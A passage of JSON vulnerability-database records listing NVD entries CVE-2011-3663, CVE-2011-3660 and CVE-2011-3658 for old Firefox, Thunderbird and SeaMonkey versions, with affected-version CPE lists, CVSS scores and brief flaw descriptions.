"cpe:2.3:a:mozilla:thunderbird:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:4.0:beta11:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.5.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:4.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:thunderbird:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.13:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:thunderbird:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0a1pre:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0.13:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:39:11", "description": "Mozilla Firefox 4.x through 8.0, Thunderbird 5.0 through 8.0, and SeaMonkey before 2.6 allow remote attackers to capture keystrokes entered on a web page, even when JavaScript is disabled, by using SVG animation accessKey events within that web page.", "edition": 5, "cvss3": {}, "published": "2011-12-21T04:02:00", "title": "CVE-2011-3663", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3663"], "modified": "2017-09-19T01:34:00", "cpe": ["cpe:/a:mozilla:seamonkey:1.0.8", "cpe:/a:mozilla:seamonkey:2.0.6", "cpe:/a:mozilla:seamonkey:2.0", "cpe:/a:mozilla:seamonkey:2.0.7", "cpe:/a:mozilla:seamonkey:1.1.17", "cpe:/a:mozilla:seamonkey:1.0.2", "cpe:/a:mozilla:seamonkey:1.1.2", "cpe:/a:mozilla:seamonkey:1.5.0.10", "cpe:/a:mozilla:seamonkey:1.1.18", "cpe:/a:mozilla:thunderbird:7.0", "cpe:/a:mozilla:seamonkey:2.0.3", "cpe:/a:mozilla:seamonkey:1.0", "cpe:/a:mozilla:firefox:4.0.1", "cpe:/a:mozilla:seamonkey:1.5.0.9", "cpe:/a:mozilla:seamonkey:2.0.11", "cpe:/a:mozilla:seamonkey:2.3", "cpe:/a:mozilla:firefox:5.0.1", "cpe:/a:mozilla:seamonkey:1.0.9", "cpe:/a:mozilla:seamonkey:2.4.1", "cpe:/a:mozilla:firefox:7.0", "cpe:/a:mozilla:seamonkey:1.1.15", "cpe:/a:mozilla:firefox:6.0.1", "cpe:/a:mozilla:seamonkey:1.1.9", "cpe:/a:mozilla:seamonkey:1.1.10", "cpe:/a:mozilla:seamonkey:1.1.12", "cpe:/a:mozilla:firefox:4.0", "cpe:/a:mozilla:thunderbird:6.0.2", "cpe:/a:mozilla:seamonkey:2.0.8", "cpe:/a:mozilla:seamonkey:1.1.6", "cpe:/a:mozilla:seamonkey:1.1.5", "cpe:/a:mozilla:seamonkey:2.4", "cpe:/a:mozilla:seamonkey:1.1.4", "cpe:/a:mozilla:firefox:7.0.1", "cpe:/a:mozilla:seamonkey:2.0.4", "cpe:/a:mozilla:seamonkey:2.0.14", "cpe:/a:mozilla:seamonkey:2.5", "cpe:/a:mozilla:thunderbird:7.0.1", "cpe:/a:mozilla:seamonkey:1.0.6", "cpe:/a:mozilla:seamonkey:2.3.3", "cpe:/a:mozilla:firefox:6.0.2", "cpe:/a:mozilla:thunderbird:6.0", "cpe:/a:mozilla:seamonkey:2.0.2", "cpe:/a:mozilla:seamonkey:1.0.4", "cpe:/a:mozilla:seamonkey:2.0.13", "cpe:/a:mozilla:seamonkey:1.0.5", "cpe:/a:mozilla:seamonkey:1.0.7", "cpe:/a:mozilla:seamonkey:1.1.11", "cpe:/a:mozilla:seamonkey:1.1.3", "cpe:/a:mozilla:thunderbird:6.0.1", "cpe:/a:mozilla:seamonkey:1.1.1", "cpe:/a:mozilla:seamonkey:1.1.7", "cpe:/a:mozilla:firefox:6.0", "cpe:/a:mozilla:seamonkey:2.0.9", "cpe:/a:mozilla:seamonkey:2.0.5", "cpe:/a:mozilla:seamonkey:2.0.12", "cpe:/a:mozilla:seamonkey:1.5.0.8", "cpe:/a:mozilla:firefox:5.0", "cpe:/a:mozilla:seamonkey:1.1.14", "cpe:/a:mozilla:seamonkey:1.1.16", "cpe:/a:mozilla:thunderbird:5.0", "cpe:/a:mozilla:seamonkey:2.2", "cpe:/a:mozilla:seamonkey:1.0.1", "cpe:/a:mozilla:seamonkey:1.0.3", "cpe:/a:mozilla:seamonkey:2.0.10", "cpe:/a:mozilla:seamonkey:1.1", "cpe:/a:mozilla:seamonkey:2.3.1", "cpe:/a:mozilla:seamonkey:2.3.2", "cpe:/a:mozilla:seamonkey:1.1.19", "cpe:/a:mozilla:seamonkey:2.0.1", "cpe:/a:mozilla:seamonkey:1.1.8", "cpe:/a:mozilla:seamonkey:2.1", "cpe:/a:mozilla:seamonkey:1.1.13"], "id": "CVE-2011-3663", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3663", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:mozilla:seamonkey:1.1.10:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.5:beta3:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0:beta_2:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.4:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0:beta_1:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.2:beta3:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.5:beta4:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:4.0:beta7:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.3:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:4.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:mozilla:thunderbird:7.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.17:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.2:beta1:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.1:alpha1:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.1:rc2:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:6.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.14:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0:alpha_3:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1:beta:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.1:alpha3:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.5.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.1:beta1:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:thunderbird:6.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:4.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.18:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.15:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.16:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:7.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1:alpha:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.12:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.5:beta2:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:4.0:beta6:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0:beta:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.19:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.2:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.5:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.5.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.11:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.3:beta1:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:4.0:beta10:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.4:beta1:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.4:beta2:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:4.0:beta5:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.5:beta1:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:6.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:4.0:beta12:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:4.0:beta8:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.2:beta2:*:*:*:*:*:*", "cpe:2.3:a:mozilla:thunderbird:6.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.1:alpha2:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.3:beta2:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0:alpha:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:4.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:4.0:beta9:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.3:beta3:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0:alpha_1:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0:alpha_2:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:thunderbird:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.1:beta2:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:4.0:beta11:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.5.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:4.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:thunderbird:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.1:beta3:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.4:beta3:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.13:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:thunderbird:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0.13:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:39:11", "description": "Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox 4.x through 8.0, Thunderbird 5.0 through 8.0, and SeaMonkey before 2.6 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via vectors that trigger a compartment mismatch associated with the nsDOMMessageEvent::GetData function, and unknown other vectors.", "edition": 5, "cvss3": {}, "published": "2011-12-21T04:02:00", "title": "CVE-2011-3660", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3660"], "modified": "2017-09-19T01:34:00", "cpe": ["cpe:/a:mozilla:seamonkey:1.0.8", "cpe:/a:mozilla:seamonkey:2.0.6", "cpe:/a:mozilla:seamonkey:1.0.99", "cpe:/a:mozilla:seamonkey:2.0", "cpe:/a:mozilla:seamonkey:2.0.7", "cpe:/a:mozilla:firefox:8.0", "cpe:/a:mozilla:seamonkey:1.1.17", "cpe:/a:mozilla:seamonkey:1.0.2", "cpe:/a:mozilla:seamonkey:1.1.2", "cpe:/a:mozilla:seamonkey:1.5.0.10", "cpe:/a:mozilla:seamonkey:1.1.18", "cpe:/a:mozilla:thunderbird:7.0", "cpe:/a:mozilla:seamonkey:2.0.3", "cpe:/a:mozilla:seamonkey:1.0", "cpe:/a:mozilla:firefox:4.0.1", "cpe:/a:mozilla:seamonkey:1.5.0.9", "cpe:/a:mozilla:seamonkey:2.0.11", "cpe:/a:mozilla:firefox:5.0.1", "cpe:/a:mozilla:seamonkey:1.0.9", "cpe:/a:mozilla:firefox:7.0", "cpe:/a:mozilla:seamonkey:1.1.15", "cpe:/a:mozilla:firefox:6.0.1", "cpe:/a:mozilla:seamonkey:1.1.9", "cpe:/a:mozilla:seamonkey:1.1.10", "cpe:/a:mozilla:seamonkey:1.1.12", "cpe:/a:mozilla:firefox:4.0", "cpe:/a:mozilla:thunderbird:6.0.2", "cpe:/a:mozilla:seamonkey:2.0.8", "cpe:/a:mozilla:seamonkey:1.1.6", "cpe:/a:mozilla:seamonkey:1.1.5", "cpe:/a:mozilla:seamonkey:1.1.4", "cpe:/a:mozilla:firefox:7.0.1", "cpe:/a:mozilla:seamonkey:2.0.4", "cpe:/a:mozilla:seamonkey:2.0.14", "cpe:/a:mozilla:seamonkey:2.5", "cpe:/a:mozilla:thunderbird:7.0.1", "cpe:/a:mozilla:seamonkey:1.0.6", "cpe:/a:mozilla:seamonkey:2.3.3", "cpe:/a:mozilla:firefox:6.0.2", "cpe:/a:mozilla:thunderbird:6.0", "cpe:/a:mozilla:seamonkey:2.0.2", "cpe:/a:mozilla:seamonkey:1.0.4", "cpe:/a:mozilla:seamonkey:2.0.13", "cpe:/a:mozilla:seamonkey:1.0.5", "cpe:/a:mozilla:thunderbird:8.0", "cpe:/a:mozilla:seamonkey:1.0.7", "cpe:/a:mozilla:seamonkey:1.1.11", "cpe:/a:mozilla:seamonkey:1.1.3", "cpe:/a:mozilla:thunderbird:6.0.1", "cpe:/a:mozilla:seamonkey:1.1.1", "cpe:/a:mozilla:seamonkey:1.1.7", "cpe:/a:mozilla:firefox:6.0", "cpe:/a:mozilla:seamonkey:2.0.9", "cpe:/a:mozilla:seamonkey:2.0.5", "cpe:/a:mozilla:seamonkey:2.0.12", "cpe:/a:mozilla:seamonkey:1.5.0.8", "cpe:/a:mozilla:firefox:5.0", "cpe:/a:mozilla:seamonkey:2.0a1pre", "cpe:/a:mozilla:seamonkey:1.1.14", "cpe:/a:mozilla:seamonkey:1.1.16", "cpe:/a:mozilla:seamonkey:2.0a1", "cpe:/a:mozilla:thunderbird:5.0", "cpe:/a:mozilla:seamonkey:1.0.1", "cpe:/a:mozilla:seamonkey:1.0.3", "cpe:/a:mozilla:seamonkey:2.0.10", "cpe:/a:mozilla:seamonkey:1.1", "cpe:/a:mozilla:seamonkey:1.1.19", "cpe:/a:mozilla:seamonkey:2.0.1", "cpe:/a:mozilla:seamonkey:1.1.8", "cpe:/a:mozilla:seamonkey:2.1", "cpe:/a:mozilla:seamonkey:1.1.13"], "id": "CVE-2011-3660", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3660", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:mozilla:seamonkey:1.1.10:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0:beta_2:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0:beta_1:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0:*:beta:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0.99:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:4.0:beta7:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:4.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:mozilla:thunderbird:7.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.17:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.1:alpha1:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:6.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.14:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0:alpha_3:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1:beta:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.1:alpha3:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.5.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.5:1.1.10:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:thunderbird:6.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:4.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.18:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.15:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.16:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:7.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1:alpha:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.12:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0:*:alpha:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:thunderbird:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0:*:dev:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:4.0:beta6:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0:beta:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.19:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.5:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.5.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.11:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:4.0:beta10:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:4.0:beta5:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:6.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0a1:*:pre:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:4.0:beta12:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:4.0:beta8:*:*:*:*:*:*", "cpe:2.3:a:mozilla:thunderbird:6.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.1:alpha2:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0:alpha:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:4.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:4.0:beta9:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0:alpha_1:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0:alpha_2:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:thunderbird:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:4.0:beta11:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.5.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:4.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:thunderbird:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.13:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:thunderbird:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0a1pre:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0.13:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:39:32", "description": "The SVG implementation in Mozilla Firefox 8.0, Thunderbird 8.0, and SeaMonkey 2.5 does not properly interact with DOMAttrModified event handlers, which allows remote attackers to cause a denial of service (out-of-bounds memory access) or possibly have unspecified other impact via vectors involving removal of SVG elements.", "edition": 3, "cvss3": {}, "published": "2011-12-21T04:02:00", "title": "CVE-2011-3658", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3658"], "modified": "2017-12-29T02:29:00", "cpe": ["cpe:/a:mozilla:firefox:8.0", "cpe:/a:mozilla:seamonkey:2.5", "cpe:/a:mozilla:thunderbird:8.0"], "id": "CVE-2011-3658", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3658", "cvss": {"score": 7.5, "vector": 